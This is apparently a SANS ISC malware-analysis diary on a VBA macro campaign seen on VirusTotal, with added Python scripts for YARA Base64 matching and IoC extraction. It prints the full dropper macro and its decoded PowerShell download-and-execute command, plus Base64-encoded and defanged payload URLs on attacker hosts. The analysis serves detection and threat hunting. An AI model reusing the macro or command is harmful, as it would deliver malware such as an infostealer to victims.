Tracking A Malware Campaign Through VT
During the weekend, I found several samples of the same VBA macro. The only difference between the samples was the URL used to fetch a malicious PE file. I have a specific YARA rule that searches for embedded PowerShell strings, and it fired several times on the same pattern in files of similar size. Here is the pattern:
31 78 77 64 58 52 30 65 53 35 6C 65 47 55 6E 4B  1xwdXR0eS5leGUnK
54 73 6F 54 6D 56 33 4C 55 39 69 61 6D 56 6A 64  TsoTmV3LU9iamVjd
43 41 74 59 32 39 74 49 46 4E 6F 5A 57 78 73 4C  CAtY29tIFNoZWxsL
YARA reacted on 'TmV3LU9iamVjd' which is the Base64-encoded string 'New-Object'.
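The reason the rule can catch 'New-Object' inside a Base64 blob is that a keyword has only three possible Base64 encodings, one per byte alignment modulo 3. The script below is an added example (not part of the diary, and not the author's YARA rule): it derives the three alignment variants of a keyword, emits a YARA rule from them, and scans a blob for any variant. The only input is the ASCII column of the hex dump above; the rule name and the function names are my own.

```python
import base64
import re

# Number of leading Base64 characters that also encode bits of the (unknown)
# bytes preceding the keyword, for each of the three possible alignments.
_LEADING_DEPENDENT = (0, 2, 3)

# ASCII column of the hex dump in the diary (the YARA hit), used as test input.
SAMPLE_FROM_DIARY = b"1xwdXR0eS5leGUnKTsoTmV3LU9iamVjdCAtY29tIFNoZWxsL"


def base64_variants(plaintext: str) -> list[str]:
    """Return the Base64 substrings that match `plaintext` at any alignment.

    Base64 encodes 3-byte groups into 4 characters, so the same keyword looks
    different depending on its offset modulo 3 in the surrounding data. For
    each offset we prepend that many dummy bytes, encode, and drop the leading
    and trailing characters whose value depends on bytes outside the keyword.
    """
    data = plaintext.encode()
    variants = []
    for offset in range(3):
        padded = b"\x00" * offset + data
        enc = base64.b64encode(padded).decode().rstrip("=")
        start = _LEADING_DEPENDENT[offset]
        # An incomplete final group emits one character that also carries bits
        # of whatever byte follows the keyword; drop it.
        end = len(enc) - (1 if len(padded) % 3 else 0)
        variants.append(enc[start:end])
    return variants


def yara_rule(name: str, keywords: list[str]) -> str:
    """Emit a YARA rule with one string per keyword and alignment."""
    lines = [f"rule {name} {{", "    strings:"]
    for k, kw in enumerate(keywords):
        for i, v in enumerate(base64_variants(kw)):
            lines.append(f'        $kw{k}_{i} = "{v}"  // {kw} at alignment {i}')
    lines += ["    condition:", "        any of them", "}"]
    return "\n".join(lines)


def find_encoded(keyword: str, blob: bytes) -> list[tuple[int, str]]:
    """Locate every alignment variant of `keyword` in `blob`: (offset, variant)."""
    hits = []
    for v in base64_variants(keyword):
        for m in re.finditer(re.escape(v).encode(), blob):
            hits.append((m.start(), v))
    return sorted(hits)


if __name__ == "__main__":
    print(yara_rule("ps_base64_keywords", ["New-Object", "Shell.Application"]))
    for kw in ("New-Object", "Shell"):
        print(kw, "->", find_encoded(kw, SAMPLE_FROM_DIARY))
```

For 'New-Object' the alignment-0 variant is exactly the 'TmV3LU9iamVjd' the rule fired on, and the alignment-1 variant of 'Shell' ('NoZWxs') is also present in the dump. YARA 4.0 and later can do this natively with the `base64` string modifier; generating the variants yourself shows what that modifier actually matches and works with older engines.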
I downloaded several files to analyze them:
Hash | Score | Timestamp | Submission | Country |
---|---|---|---|---|
2169c95c7587d4876449e0a57cb0f057d9df19e867a73e83e63aeaca1e2d4eae | 8/58 | 2020-08-20 02:05:10 UTC | e74f3978 | US |
c5f3874b7cd7ae726b12b7488d374972cb63b6e7dac73d71ededc20d80cf8318 | 9/57 | 2020-08-20 03:39:30 UTC | e74f3978 | US |
d86cfc2c43a0599b23416cfc3be08e8c3d8d2b2b7b7b935b76d8ec6aa70e1705 | 8/58 | 2020-08-20 01:13:49 UTC | e74f3978 | US |
174b27b020f930f5395cd993e92ebfc2795b1f3664265be7cea9d1405e870cd0 | 7/58 | 2020-08-19 19:30:20 UTC | e74f3978 | US |
caf1e1da396743767f9e2a3c4b85780bc0146aeaae8bed18aef9d5c918fda439 | 9/57 | 2020-08-21 00:05:49 UTC | e74f3978 | US |
b52f376b6b49a7c73e7a0befc821661bb9f19f5b4cf1561f277f7d347745a199 | 9/57 | 2020-08-20 22:57:00 UTC | e74f3978 | US |
ef20a30463d0935ab34f119604ad5890c2d2ee0e4e400ed43c7faf4a8fd5b528 | 9/58 | 2020-08-20 22:43:53 UTC | e74f3978 | US |
670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c | 8/56 | 2020-08-20 23:44:18 UTC | e74f3978 | US |
b0f6c17244c2f8cce46425212f5cf9786fbd36727c34bf4d10d90d6a073a539e | 9/57 | 2020-08-20 23:58:14 UTC | e74f3978 | US |
d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb | 8/57 | 2020-08-20 22:45:54 UTC | e74f3978 | US |
b8f308694b369a2e4d0a51966e6962eb0f2ac55e9cddcbbe726b0f867f9e6a66 | 8/58 | 2020-08-20 23:39:47 UTC | e74f3978 | US |
670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c | 9/57 | 2020-08-22 03:56:41 UTC | e74f3978 | US |
ef20a30463d0935ab34f119604ad5890c2d2ee0e4e400ed43c7faf4a8fd5b528 | 9/57 | 2020-08-22 03:31:37 UTC | e74f3978 | US |
670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c | 9/57 | 2020-08-22 03:56:41 UTC | e74f3978 | US |
d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb | 9/56 | 2020-08-22 03:54:50 UTC | e74f3978 | US |
2169c95c7587d4876449e0a57cb0f057d9df19e867a73e83e63aeaca1e2d4eae | 9/58 | 2020-08-22 03:45:04 UTC | e74f3978 | US |
b8f308694b369a2e4d0a51966e6962eb0f2ac55e9cddcbbe726b0f867f9e6a66 | 8/56 | 2020-08-22 03:37:19 UTC | e74f3978 | US |
566e46a36fbeadf23a43541d8fb19d5d1cd8f3e33b60abef221a1f6a1af0f1cb | 9/57 | 2020-08-22 03:34:29 UTC | e74f3978 | US |
As you can see, all samples were submitted from the US and from the same account. Their scores are also very close to each other.
All of them contain the same VBA macro and the only difference is the downloader link:
$ diff \
    c5f3874b7cd7ae726b12b7488d374972cb63b6e7dac73d71ededc20d80cf8318 \
    d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb
10c10
< Loader"aHR0cDovLzE5OC4xMi42Ni4xMDQvbVZQMjlVQVl4bEZsU3JGLmV4ZQ=="
---
> Loader"aHR0cDovLzE5OC4xMi42Ni4xMDYvZmxvY3J5cHRlZC5leGU="
Here is the list of extracted URLs:
$ grep 'Loader"' * | awk -F '"' '{ print $2}' | while read L; do echo $L | base64 -d; echo ; done
hxxp://198[.]12[.]66[.]104/bOYzlVIPPDT3m7g[.]exe
hxxp://198[.]12[.]66[.]106/924ZJpzgdvpZuNt[.]exe
hxxp://198[.]12[.]66[.]106/TuSQk2FmRK1iLJI[.]exe
hxxp://198[.]12[.]66[.]104/jojocrypted[.]exe
hxxp://198[.]12[.]66[.]106/royalcrypted[.]exe
hxxp://brandotoday[.]com/Sample3[.]exe
hxxp://198[.]12[.]66[.]104/99crypted[.]exe
hxxp://198[.]12[.]66[.]104/mVP29UAYxlFlSrF[.]exe
hxxp://198[.]12[.]66[.]104/miccrypted[.]exe
hxxp://198[.]12[.]66[.]106/flocrypted[.]exe
hxxp://198[.]12[.]66[.]106/qlOZ1gn6tOo0tx7[.]exe
hxxp://198[.]12[.]66[.]106/vipcrypted[.]exe
The macro is a simple but effective one. It tries to download and execute the payload as 'putty.exe':
Private Sub Workbook_Open()
    ' Runs automatically when the workbook is opened; only this Base64 URL changes between samples
    Loader"aHR0cDovLzE5OC4xMi42Ni4xMDYvZmxvY3J5cHRlZC5leGU="
End Sub

Public Sub Loader(Link As String)
    ' The hex string decodes to "WScript.Shell"; the two Base64 blobs wrap the URL in a PowerShell command
    CreateObject(AWqQ32PO095TRDFvcBBnMZAqQP87BXCVrwe_QARWE("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (Base64Decode("cG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVcgSGlkZGVuIC1jb21tYW5kIChuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJw==" & Link & "JywkZW52OlRlbXArJ1xwdXR0eS5leGUnKTsoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4ZWN1dGUoJGVudjpUZW1wKydccHV0dHkuZXhlJyk="))
End Sub
The decoded executed content is:
CreateObject(WScript.Shell)).Run( \
    powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile(' \
    & Link & \
    ',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
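The grep/base64 one-liner above and the hex-obfuscated "WScript.Shell" string are the two things an analyst wants pulled out of every sample automatically. The script below is an added example, not the diary's tooling: it takes macro text, decodes the Loader argument and the space-separated hex string, defangs the URLs the way the diary does (hxxp and [.]), and groups them by host. The two macro excerpts are constructed from the diary's diff output (the Base64 strings are the ones shown there, keyed by the two hashes that were diffed); the function names are my own, and `Deobf` stands in for the macro's long random-looking helper name.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Constructed inputs for this example: abbreviated macro excerpts keyed by the
# two hashes the diary diffed, carrying the Loader arguments from that diff.
SAMPLES = {
    "c5f3874b7cd7ae726b12b7488d374972cb63b6e7dac73d71ededc20d80cf8318":
        'Private Sub Workbook_Open()\n'
        'Loader"aHR0cDovLzE5OC4xMi42Ni4xMDQvbVZQMjlVQVl4bEZsU3JGLmV4ZQ=="\n'
        'End Sub\n'
        'Public Sub Loader(Link As String)\n'
        'CreateObject(Deobf("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (...)\n'
        'End Sub\n',
    "d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb":
        'Private Sub Workbook_Open()\n'
        'Loader"aHR0cDovLzE5OC4xMi42Ni4xMDYvZmxvY3J5cHRlZC5leGU="\n'
        'End Sub\n',
}

# Loader"<base64>" as written in the macro (with or without a space).
LOADER_RE = re.compile(r'Loader\s*"([A-Za-z0-9+/=]+)"')
# Quoted, space-separated hex bytes such as "57 53 63 ... 6C".
HEX_WORDS_RE = re.compile(r'"((?:[0-9A-Fa-f]{2} )+[0-9A-Fa-f]{2})"')


def decode_hex_words(s: str) -> str:
    """Decode a space-separated hex string to text (latin-1 never fails)."""
    return bytes.fromhex(s.replace(" ", "")).decode("latin-1")


def b64_to_text(s: str):
    """Strict Base64 decode to UTF-8; None if the blob is not valid text."""
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def defang(value: str) -> str:
    """Render a URL or host safely for reports: http -> hxxp, '.' -> '[.]'."""
    return re.sub(r"^http", "hxxp", value, flags=re.IGNORECASE).replace(".", "[.]")


def extract_loader_urls(macro_text: str) -> list[str]:
    """Decode every Loader argument that turns out to be an http(s) URL."""
    urls = []
    for m in LOADER_RE.finditer(macro_text):
        decoded = b64_to_text(m.group(1))
        if decoded and decoded.lower().startswith(("http://", "https://")):
            urls.append(decoded)
    return urls


def extract_iocs(samples: dict[str, str]) -> dict:
    """Defanged URLs per sample, hosts with the samples using them, decoded strings."""
    report = {"urls": [], "hosts": {}, "decoded_strings": []}
    for sha256, text in samples.items():
        for url in extract_loader_urls(text):
            report["urls"].append((sha256, defang(url)))
            host = urlparse(url).hostname or ""
            report["hosts"].setdefault(defang(host), []).append(sha256)
        for m in HEX_WORDS_RE.finditer(text):
            report["decoded_strings"].append(decode_hex_words(m.group(1)))
    return report


if __name__ == "__main__":
    result = extract_iocs(SAMPLES)
    for sha256, url in result["urls"]:
        print(sha256[:12], url)
    print("hosts:", sorted(result["hosts"]))
    print("decoded strings:", result["decoded_strings"])
```

Strict Base64 validation matters here: a truncated or tampered blob silently decodes to garbage with the default lenient decoder, whereas `validate=True` plus the http prefix check keeps junk out of the IoC list. Grouping by host reproduces what the diary's URL list shows at a glance, that two IPs on the same /24 serve almost all of the payloads.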
All downloads failed but I found a sample already available on VT[1]. It looks like an Agent Tesla.
The question is: who is behind this submission key and submitted these samples so many times? VT does not allow us to search all submissions from the same account (which would be a great feature for hunting purposes!).
Some possible scenarios:
- The developers of the macro, testing it? I don't think so, because only the link changes across all the submissions.
- An organization that is facing many similar documents and submits them to VT automatically?
- Another security researcher?
While writing this diary, I found five more samples; the campaign is still ongoing!
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant